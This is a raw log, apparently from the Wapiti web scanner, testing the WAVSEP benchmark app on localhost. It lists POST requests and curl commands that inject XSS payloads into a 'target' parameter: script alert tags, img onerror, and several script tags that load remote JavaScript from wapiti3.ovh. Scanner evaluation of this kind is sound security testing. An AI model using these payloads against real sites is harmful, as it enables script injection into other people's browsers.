curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wh2jhcx9fe%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wh1squ9zct%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wh1squ9zct%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27w5rh0pf00e%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w5rh0pf00e%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27w2o8rmbaya%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w2o8rmbaya%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wg8703x46a%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wg8703x46a%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wut11xy78l%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wut11xy78l%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27w6bqj2waqz%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w6bqj2waqz%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wbkvy5n4jl%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wbkvy5n4jl%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wpk3qn92uj%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wpk3qn92uj%22%29%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wjjagm522d%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wjjagm522d%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wjbeoxwa4s%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wjbeoxwa4s%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wytwq2jlwc%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wytwq2jlwc%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wuoc1g6dg1%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wuoc1g6dg1%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wadxq7jkmk%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wadxq7jkmk%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wr90kf0djb%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wr90kf0djb%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wj8ovg5ier%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wj8ovg5ier%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wr7idx7fq4%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wr7idx7fq4%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wk8mbmd60z%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wk8mbmd60z%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wd8h0j974t%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wd8h0j974t%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27w8w65rsfak%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w8w65rsfak%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzcpojgklfz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzcpojgklfz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw7oi30zhcoz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw7oi30zhcoz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wzp6nu2v4q%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wzp6nu2v4q%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw95nss3qhjz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw95nss3qhjz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wihrqf8130%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wihrqf8130%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwngx0p571lz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwngx0p571lz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wvl93pulj9%27%29%3C%2Fscript%3E
